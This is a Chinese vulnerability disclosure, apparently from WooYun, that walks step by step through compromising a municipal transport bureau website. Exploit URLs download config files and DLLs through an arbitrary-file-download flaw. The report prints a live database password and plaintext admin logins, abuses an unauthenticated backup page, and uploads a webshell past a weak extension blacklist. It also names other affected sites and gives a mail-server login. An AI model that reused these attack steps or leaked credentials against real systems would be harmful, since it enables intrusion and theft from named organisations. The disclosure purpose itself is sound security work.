WooYun.org

以下过程只是为了证明漏洞存在,并无恶意。
仅给出交通运输局的测试过程:
下载点:
http://www.ncjt.gov.cn/DownLoad.aspx?FileName=web.config&strAbsolutePath=D:\ncjt\web.config
获得aspx的配置文件，绝对路径直接泄露网站的根目录
数据库配置信息:
<add key="SQLCONNECTIONSTRING" value="data source=(local);server=(local);uid=ncjt;pwd=ncjt035jk*#gfj4545;database=ncjt"></add>
在复杂的密码，在任意文件下载面前都是无用...
远程连接失败...
继续下载测试:
http://www.ncjt.gov.cn/DownLoad.aspx?FileName=DownLoad.aspx&strAbsolutePath=D:\ncjt\DownLoad.aspx
下载DownLoad.aspx.cs
http://www.ncjt.gov.cn/DownLoad.aspx?FileName=DownLoad.aspx.cs&strAbsolutePath=D:\ncjt\DownLoad.aspx.cs 失败，说明源代码被封装...
由DownLoad.aspx内容
<%@ Page language="c#" Codebehind="DownLoad.aspx.cs" AutoEventWireup="false" Inherits="ncjt.DownLoad" %>
可以猜测出源码保存在ncjt.dll文件中下载...
http://www.ncjt.gov.cn/DownLoad.aspx?FileName=ncjt.dll&strAbsolutePath=D:\ncjt\Bin\ncjt.dll
使用net reflector打开下载的ncjt.dll,获得源代码

从上图可以看到，网站有数据库备份功能，因此直接访问
http://www.ncjt.gov.cn/databackup.aspx
没有认证
备份数据库成功，数据库备份文件保存在'e:\databackup.bak'
直接使用下载点下载数据库备份文件
http://www.ncjt.gov.cn/DownLoad.aspx?FileName=databackup.bak&strAbsolutePath=e:\databackup.bak
本地附加数据库，获得管理密码
Admin/*jtj_web#
yyq/yyq
wufengqin/123456
都是明文存储，直接登录后台
http://www.ncjt.gov.cn/manage/manageindex.aspx

在政务公告附件 功能，找到上传点:
http://www.ncjt.gov.cn/manage/manage/news/AddLoadFrm.aspx?NewsNo=00002920&mpage=0&mTaskNo=001001
直接上传失败，看一下源代码:

上传点限制文件后缀，但是没有对文件重命名，只是在文件前面增加一个字符串，这种黑名单检测很容易绕过，上传得shell.
http://www.ncjt.gov.cn/manage/manage/news/file/000001311.asp;.txt
http://www.ncjt.gov.cn/manage/test.aspx
友情提醒:
使用该套代码的还有如下站点(省略具体过程):
http://www.ncghj.com/manage/test.aspx
而且该站点有邮件服务器:
http://mail.ncyg.cn/www/admin/index.php
yuwen/yuwen

而且是sa权限连接数据库...
还有城乡规划 局...
http://www.ncghj.com/manage/test.aspx
是否还有其它实例，没有继续查找，只是想借用此例说明，任意文件下载导致源码泄露危害是很大...